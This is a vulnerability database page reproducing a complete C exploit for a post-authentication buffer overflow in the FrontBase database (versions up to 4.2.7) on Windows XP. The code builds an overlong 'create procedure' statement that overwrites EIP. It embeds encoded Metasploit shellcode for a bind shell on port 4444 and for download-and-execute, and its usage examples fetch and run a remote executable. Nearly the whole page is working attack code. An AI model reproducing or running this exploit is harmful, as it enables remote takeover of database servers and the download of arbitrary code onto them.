Vulners
Lucene search
Frontbase <= 4.2.7 POST-AUTH Remote Buffer Overflow Exploit v2.2
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Frontbase <= 4.2.7 for Windows
* Site : http://www.frontbase.com
* Found by : Netragard, L.L.C Advisory
* ----------------------------------------
* Exploit : Frontbase <= 4.2.7 POST-AUTH remote buffer overflow
* Exploit date : 02.04.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows XP SP0-SP2
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : This is the EIP overwrite realization of the Frontbase 'create procedure' buffer overflow.
* Exploit was tested on Frontbase 4.2.7 and 4.1.16 versions under Windows XP SP0, Windows XP SP1, Windows XP SP2.
* to add the Windows 2000 here , you will need to update a little stabstack code or use the SEH method exploit.
*
* this version of that exploit doesn't used the code from win32 SEH GetPC project to get the baseaddress
* cause this was not worked on the Windows XP, so i took it from stack and calculated baseaddress.
*
* also i added here the 'Download and Execute exploit'.
*
* Exploit requires authentification!
*
* ----------------------------------------
* Compiling:
* To compile this exploit you need:
* 1. Folder 'C:\usr\FrontBase\Include\FBCAccess' copy to exploit folder.
* 2. Copy from 'C:\usr\FrontBase\lib\' file 'FBCAccess.lib' to your exploit folder.
* 3. Select 'FBCAccess.lib' in linker options
* 4. Compile.
* ----------------------------------------
* Thanks to:
* 1. Netragard, L.L.C Advisory ( http://www.netragard.com -- "We make I.T. Safe." )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 4. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
#include "FBCAccess/FBCAccess.h"
void usage(char * s);
void logo();
void prepare_shellcode(unsigned char * fsh, int sh, char * url);
void make_buffer(char * buf, int itarget, int sh, char * url);
int validate_args( int port, int sh, int itarget);
int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf);
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct _target{
const char *t ;
unsigned long ret ;
} targets[] =
{ // alphanumeric jmp esp, for Windows XP i found it only in ole32.dll
{"Windows XP SP0 RUSSIAN [ ole32.dll ]", 0x77271f36 },
{"Windows XP SP1 RUSSIAN [ ole32.dll ]", 0x77270670 },
{"Windows XP SP2 RUSSIAN [ ole32.dll ]", 0x77544326 },
{"Windows XP SP2 DUTCH [ ole32.dll ]", 0x77514326 },
{NULL, 0x00000000 }
};
struct {
const char * name;
char * shellcode;
}shellcodes[]={
{"Spawn bindshell on port 4444",
/* modified win32_bind - EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com
first jmp instructions removed, cause we already have the baseaddress in ECX */
"\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x76\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x50\x38\x42\x42\x75\x38\x69\x39\x6c\x52"
"\x4a\x5a\x4b\x42\x6d\x68\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x65"
"\x30\x6c\x4b\x30\x6c\x31\x34\x71\x34\x4e\x6b\x42\x65\x65\x6c\x6e"
"\x6b\x53\x4c\x43\x35\x62\x58\x55\x51\x4a\x4f\x4e\x6b\x72\x6f\x54"
"\x58\x6c\x4b\x51\x4f\x77\x50\x53\x31\x78\x6b\x43\x79\x4e\x6b\x54"
"\x74\x6c\x4b\x35\x51\x6a\x4e\x64\x71\x6f\x30\x6e\x79\x6e\x4c\x6d"
"\x54\x6f\x30\x64\x34\x55\x57\x4f\x31\x59\x5a\x36\x6d\x36\x61\x59"
"\x52\x5a\x4b\x4c\x34\x37\x4b\x62\x74\x47\x54\x46\x48\x70\x75\x4d"
"\x35\x6c\x4b\x73\x6f\x64\x64\x33\x31\x4a\x4b\x43\x56\x4c\x4b\x44"
"\x4c\x62\x6b\x6e\x6b\x63\x6f\x57\x6c\x65\x51\x6a\x4b\x77\x73\x56"
"\x4c\x6c\x4b\x6e\x69\x62\x4c\x44\x64\x45\x4c\x55\x31\x6f\x33\x44"
"\x71\x6b\x6b\x51\x74\x4e\x6b\x53\x73\x30\x30\x4e\x6b\x57\x30\x34"
"\x4c\x6c\x4b\x64\x30\x37\x6c\x4e\x4d\x6c\x4b\x53\x70\x73\x38\x73"
"\x6e\x30\x68\x4c\x4e\x62\x6e\x74\x4e\x38\x6c\x30\x50\x79\x6f\x6a"
"\x76\x51\x76\x30\x53\x42\x46\x72\x48\x35\x63\x45\x62\x33\x58\x64"
"\x37\x64\x33\x74\x72\x43\x6f\x33\x64\x4b\x4f\x78\x50\x52\x48\x38"
"\x4b\x7a\x4d\x4b\x4c\x57\x4b\x62\x70\x69\x6f\x6e\x36\x71\x4f\x6e"
"\x69\x4b\x55\x33\x56\x6c\x41\x4a\x4d\x76\x68\x74\x42\x63\x65\x51"
"\x7a\x77\x72\x4b\x4f\x4a\x70\x63\x58\x6e\x39\x35\x59\x6b\x45\x4e"
"\x4d\x30\x57\x4b\x4f\x38\x56\x50\x53\x50\x53\x42\x73\x51\x43\x70"
"\x53\x70\x43\x32\x73\x52\x63\x76\x33\x59\x6f\x6e\x30\x55\x36\x33"
"\x58\x76\x71\x71\x4c\x63\x56\x56\x33\x6e\x69\x59\x71\x4e\x75\x55"
"\x38\x4c\x64\x55\x4a\x72\x50\x6b\x77\x56\x37\x4b\x4f\x4e\x36\x53"
"\x5a\x56\x70\x32\x71\x33\x65\x69\x6f\x4e\x30\x62\x48\x39\x34\x4c"
"\x6d\x74\x6e\x4a\x49\x63\x67\x69\x6f\x79\x46\x43\x63\x36\x35\x6b"
"\x4f\x68\x50\x35\x38\x5a\x45\x70\x49\x6d\x56\x70\x49\x41\x47\x6b"
"\x4f\x68\x56\x56\x30\x41\x44\x33\x64\x71\x45\x69\x6f\x4e\x30\x4d"
"\x43\x53\x58\x5a\x47\x70\x79\x6b\x76\x73\x49\x41\x47\x49\x6f\x4e"
"\x36\x63\x65\x4b\x4f\x4e\x30\x53\x56\x50\x6a\x35\x34\x53\x56\x41"
"\x78\x61\x73\x30\x6d\x4c\x49\x4b\x55\x72\x4a\x72\x70\x76\x39\x45"
"\x79\x58\x4c\x6b\x39\x59\x77\x31\x7a\x67\x34\x4c\x49\x49\x72\x70"
"\x31\x6f\x30\x6c\x33\x6f\x5a\x69\x6e\x72\x62\x36\x4d\x4b\x4e\x53"
"\x72\x34\x6c\x6a\x33\x6e\x6d\x62\x5a\x36\x58\x6c\x6b\x4c\x6b\x4e"
"\x4b\x61\x78\x30\x72\x6b\x4e\x6d\x63\x46\x76\x4b\x4f\x44\x35\x32"
"\x64\x39\x6f\x38\x56\x51\x4b\x70\x57\x52\x72\x70\x51\x32\x71\x53"
"\x61\x42\x4a\x43\x31\x56\x31\x46\x31\x70\x55\x43\x61\x79\x6f\x6a"
"\x70\x62\x48\x6e\x4d\x59\x49\x67\x75\x7a\x6e\x33\x63\x39\x6f\x59"
"\x46\x63\x5a\x59\x6f\x4b\x4f\x76\x57\x6b\x4f\x6a\x70\x4c\x4b\x61"
"\x47\x59\x6c\x6b\x33\x38\x44\x43\x54\x49\x6f\x58\x56\x36\x32\x59"
"\x6f\x4e\x30\x43\x58\x68\x70\x4f\x7a\x54\x44\x73\x6f\x71\x43\x4b"
"\x4f\x4e\x36\x6b\x4f\x78\x50\x66"
},
{ "Download and execute shellcode (set URL)",
/* win32_download_exec - http://metasploit.com */
/* encoded by "ALPHA 2: Zero-tolerance. <[email protected]> */
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51"
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4A\x49\x58\x6B\x36\x70\x71\x4A\x33\x7A\x76\x53\x59\x59\x71"
"\x76\x38\x39\x57\x4C\x35\x51\x6B\x30\x74\x74\x74\x4A\x6E\x79\x39"
"\x72\x7A\x5A\x78\x6B\x36\x65\x4D\x38\x7A\x4B\x4B\x4F\x4B\x4F\x4B"
"\x4F\x54\x30\x50\x4C\x4E\x79\x6C\x59\x5A\x39\x4F\x33\x79\x6D\x55"
"\x68\x6C\x69\x5A\x39\x4E\x79\x4A\x39\x34\x52\x58\x59\x6E\x75\x54"
"\x52\x4B\x59\x6D\x55\x36\x54\x45\x42\x7A\x79\x6F\x61\x56\x72\x53"
"\x71\x34\x52\x5A\x4A\x6D\x75\x76\x72\x4A\x4D\x4E\x67\x4D\x31\x6F"
"\x6A\x72\x4A\x36\x72\x6B\x57\x4E\x59\x4F\x6A\x33\x52\x76\x72\x6E"
"\x37\x4C\x4D\x6F\x5A\x74\x34\x7A\x6F\x48\x4E\x79\x58\x55\x42\x4D"
"\x76\x4C\x5A\x73\x52\x74\x52\x32\x4B\x6B\x43\x4C\x57\x49\x50\x52"
"\x4A\x75\x6F\x7A\x4D\x4A\x31\x69\x50\x59\x56\x54\x5A\x51\x4E\x4F"
"\x6D\x69\x4C\x33\x4B\x64\x30\x4B\x70\x6F\x36\x6B\x77\x54\x52\x73"
"\x64\x62\x32\x79\x4F\x4D\x6D\x6E\x7A\x70\x5A\x73\x78\x70\x78\x4F"
"\x6A\x62\x78\x6D\x7A\x50\x50\x4B\x4F\x75\x42\x4A\x31\x75\x42\x4B"
"\x6F\x6F\x75\x4D\x4A\x61\x4A\x52\x78\x52\x58\x4D\x4B\x6E\x7A\x50"
"\x58\x66\x72\x4D\x49\x6D\x4A\x51\x4A\x56\x72\x55\x33\x62\x32\x50"
"\x6E\x55\x4A\x51\x4F\x4E\x77\x75\x42\x63\x79\x49\x63\x4D\x4D\x39"
"\x50\x32\x51\x4B\x79\x4D\x49\x6D\x49\x6E\x79\x76\x7A\x51\x4F\x4C"
"\x54\x68\x4B\x78\x4F\x71\x76\x6A\x6E\x55\x35\x59\x53\x77\x62\x53"
"\x71\x4B\x43\x4E\x78\x39\x50\x31\x61\x59\x34\x4D\x49\x4C\x59\x6E"
"\x79\x46\x7A\x71\x4F\x6F\x7A\x6A\x6F\x69\x4F\x74\x59\x4D\x77\x77"
"\x69\x78\x6C\x73\x53\x37\x69\x6E\x4F\x37\x69\x7A\x67\x75\x4A\x73"
"\x45\x6E\x59\x75\x42\x71\x55\x6B\x43\x78\x39\x4B\x7A\x45\x36\x68"
"\x4E\x73\x45\x31\x4E\x6D\x4D\x4F\x6A\x39\x55\x79\x68\x6E\x57\x4B"
"\x4C\x51\x4E\x6B\x6D\x4F\x6A\x4D\x4D\x38\x61\x79\x6C\x6C\x59\x6A"
"\x39\x4F\x5A\x70\x59\x4B\x79\x79\x59\x6A\x6A\x4A\x6F\x39\x59\x73"
"\x56\x48\x4E\x53\x55\x55\x42\x71\x55\x6B\x79\x6A\x6A\x50\x66\x48"
"\x4E\x65\x39\x6A\x69\x65\x36\x78\x4E\x50\x6D\x6F\x5A\x52\x79\x30"
"\x35\x35\x4C\x50\x59\x4A\x4C\x31\x70\x58\x48\x78\x4B\x78\x4F\x6A"
"\x6A\x52\x46\x50\x4B\x68\x43\x6B\x70\x74\x72\x73\x4B\x70\x77\x4F"
"\x5A\x56\x39\x73\x6A\x61\x61\x4D\x6F\x63\x56\x43\x56\x75\x36\x4B"
"\x6E\x79\x6C\x7A\x4D\x6F\x39\x78\x6B\x58\x76\x6B\x4A\x78\x58\x4B"
"\x4D\x6B\x4D\x5A\x4B\x4B\x4C\x4A\x4A\x7A\x4A\x5A\x39\x59\x4E\x6B"
"\x4C\x48\x6D\x5A\x6A\x6B\x50\x4B\x5A\x5A\x4D\x4B\x4C\x4B\x44\x6B"
"\x6D\x6C\x30\x4A\x4B\x6B\x4C\x79\x6A\x58\x6D\x59\x66\x5A\x4B\x59"
"\x70\x68\x58\x4D\x49\x7A\x6E\x6A\x50\x4C\x37\x4B\x6C\x6D\x31\x6B"
"\x4C\x6B\x4A\x6C\x59\x4B\x6C\x6B\x51\x5A\x50\x48\x6D\x4A\x6D\x68"
"\x71\x4A\x4B\x79\x6C\x59\x68\x6B\x4D\x4F\x69\x6E\x35\x4B\x46\x6B"
"\x48\x4B\x4D\x4E\x35\x78\x70\x6B\x4B\x4A\x4B\x7A\x58\x48\x6B\x4B"
"\x50\x4A\x78\x4C\x59\x4A\x4C\x4A\x4B\x6A\x55\x59\x64\x4C\x36\x6B"
"\x47\x4E\x79\x68\x4C\x38\x4B\x7A\x75\x4B\x6D\x79\x66\x7A\x4E\x4B"
"\x47\x39\x65\x4A\x56\x58\x78\x4B\x4D\x7A\x6D\x4C\x36\x59\x4F\x78"
"\x70\x7A\x55\x39\x6C\x6E\x38\x6D\x49"
},
{NULL , NULL }
};
// alphanumeric stack stabilizer
char stabstack[]= "\x01\x01\x01\x01\x54\x54\x5b\x58\x66\x2d\x30\x30\x50\x5c\x53\x58\x04\x20\x50\x59";
int main(int argc, char **argv)
{
char temp1[100], temp2[100];
char *url= NULL, * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL;
char default_remotehost[]="127.0.0.1";
char default_user[]="_SYSTEM";
char default_password[]="";
char default_database[]="";
char default_dbpassword[]="";
int port, itarget, sh;
char c;
logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=-1;
itarget=0;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:x:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
case 'u':
user=optarg;
break;
case 'P':
password=optarg;
break;
case 'd':
database=optarg;
break;
case 'x':
url=optarg;
break;
default:
usage(argv[0]);
return -1;
}
}
if(validate_args( port, sh, itarget)==-1) return -1;
if(remotehost == NULL) remotehost=default_remotehost;
if(user == NULL) user=default_user;
if(password == NULL) password=default_password;
if(dbpassword == NULL) dbpassword=default_dbpassword;
if(database == NULL) database=default_database;
if(url == NULL) url="";
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
if(port!=-1)
{
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
}else
{
sprintf(temp2, "%s", database);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Database: %s%s# \n", temp2, temp1);
}
sprintf(temp2, "%s", user);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # User : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Shellcde: %s%s# \n", temp2, temp1);
if(sh==1)
{
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", url );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # URL : %s%s# \n", temp2, temp1);
}
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);
char buf[20000];
memset(buf,0,sizeof(buf));
printf("[+] Constructing attacking buffer... ");
fflush(stdout);
make_buffer((char *)buf,itarget,sh, url);
printf("done\n");
if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1)
{
fprintf(stdout, "[-] Cannot exploit server %s\n", remotehost);
return -1;
}
return 0;
}
int validate_args(int port, int sh, int itarget)
{
int i=0,x=0;
for(i=0;shellcodes[i].name;i++)if(i==sh)x=1;
if(x==0)
{
printf("[-] The shellcode number is invalid\n");
return -1;
}
x=0;
for(i=0;targets[i].t;i++)if(i==itarget)x=1;
if(x==0)
{
printf("[-] The target is invalid\n");
return -1;
}
return 1;
}
void prepare_shellcode( char * fsh, int sh, char * url)
{
memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode));
if(sh==1)
{
char locurl[1000];
memcpy(locurl, url, strlen(url));
locurl[strlen(locurl)]='\x80';
char encoded_url[2500] ;
alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
strcat(fsh, encoded_url);
}
}
void make_buffer(char * buf, int itarget, int sh, char * url)
{
// -=[ prepare shellcode ]=-
char fsh[1000];
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, sh, url);
// -----------------
// -=[ fill buffer here ]=-
memset(buf,0,sizeof(buf));
char * cp = buf;
// make vulnerable sql92 command to get exploit
strcat(buf, "create procedure \"");
cp=buf+strlen(buf);
// long buffer
memset(cp, 'A', 255);
cp+=strlen((char *)cp);
// overwrite EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// some chars
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
// put stack stabilizer
memcpy(cp, stabstack, strlen(stabstack));
cp+=strlen((char *)cp);
// put shellcode
memcpy(cp, fsh, strlen(fsh));
cp+=strlen((char *)cp);
// :P
memset(cp, 'A', 10);
cp+=strlen((char *)cp);
// end of the sql92 command
memcpy(cp, "\"()\n begin\n end;", strlen("\"()\n begin\n end;"));
// -----------------
}
int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf)
{
FBCDatabaseConnection * fbdc;
FBCMetaData *meta;
char sesn[]="dreatica-fxp";
if(database!=NULL) port = -1;
fbcInitialize();
if (port!=-1)
{
printf("[+] Connecting to %s:%d\n", host, port);
fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword);
}else
{
printf("[+] Connecting to %s to database %s\n", host, database);
fbdc = fbcdcConnectToDatabase(database, host, dbpassword);
}
if (fbdc == NULL)
{
printf("[-] Cannot connect to %s\n", host);
return -1;
}
char * session_name=sesn;
meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user");
if (fbcmdErrorsFound(meta) != 0)
{
printf("[-] Failed to create session\n");
FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
char* msgs = fbcemdAllErrorMessages(emd);
fbcemdRelease(emd);
free(msgs);
fbcmdRelease(meta);
fbcdcClose(fbdc);
fbcdcRelease(fbdc);
return -1;
}
fbcmdRelease(meta);
printf("[+] Sending %d bytes of buffer to server, check the shell\n", strlen(buf));
// if exploit success, the app will stop here.
meta = fbcdcExecuteDirectSQL(fbdc, buf);
if (fbcmdErrorsFound(meta) != 0)
{
printf("[-] Failed to send buffer\n");
FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
char* msgs = fbcemdAllErrorMessages(emd);
fbcemdRelease(emd);
free(msgs);
fbcmdRelease(meta);
fbcdcClose(fbdc);
fbcdcRelease(fbdc);
return -1;
}
fbcmdRelease(meta);
return 1;
}
// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded )
{
int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
char temp[10];
memset(temp, 0 , sizeof(temp));
memset(encoded,0x00,1000);
srand((int)clock());
while( (input = to_encode[ii++]) != 0 ) {
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
E = valid_chars[i] >> 4;
D = (A^E);
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
C = valid_chars[i] >> 4;
sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
encoded[strlen(encoded)]=temp[0];
encoded[strlen(encoded)]=temp[1];
}
encoded[strlen(encoded)]='A';
return 0;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf(" Usage: %s -h <host> -p <port> -s <shellcode> -t <target> -u <user> -p <password> -d <database> -D <dbpassword> -x <url>\n", s);
printf(" ----------------------------------------------------------------------- \n");
printf(" Arguments:\n");
printf("\n");
printf(" -h <host> the host IP to attack\n");
printf(" -p <port> the port of server (default: -1 )\n");
printf(" -s <shellcode> shellcode number (default: 1 )\n");
printf(" -t <target> target number (default: 1 )\n");
printf(" -u <user> user name of frontbase (default: _SYSTEM)\n");
printf(" -p <password> user password (default: <blank>)\n");
printf(" -d <database> database (if port = -1) (default: <blank>)\n");
printf(" -D <dbpassword> database password (default: <blank>)\n");
printf(" -x <url> URL to executable (default: <blank>)\n");
printf("\n");
printf(" Shellcodes:\n\n");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %s \n",i+1,shellcodes[i].name);
}
printf("\n");
printf(" Targets:\n\n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1,targets[j].t);
}
printf("\n");
printf(" Examples:\n\n");
printf(" %s -h 127.0.0.1 -d New\n", s);
printf(" %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1\n", s);
printf(" %s -h 127.0.0.1 -d New -t 5 -s 2 -x http://dreatica.com/calc.exe\n", s);
printf(" ----------------------------------------------------------------------- \n");
}
void logo()
{
printf(" ####################################################################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ####################################################################### \n");
printf(" # Exploit : Frontbase <= 4.2.7 for Windows (multiple targets) # \n");
printf(" # Tested : Frontbase 4.1.16 and 4.2.7 # \n");
printf(" # Author : Heretic2 ([email protected]) # \n");
printf(" # Version : 2.2 # \n");
printf(" # System : Windows XP SP0-SP2 # \n");
printf(" # Date : 02.04.2007 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1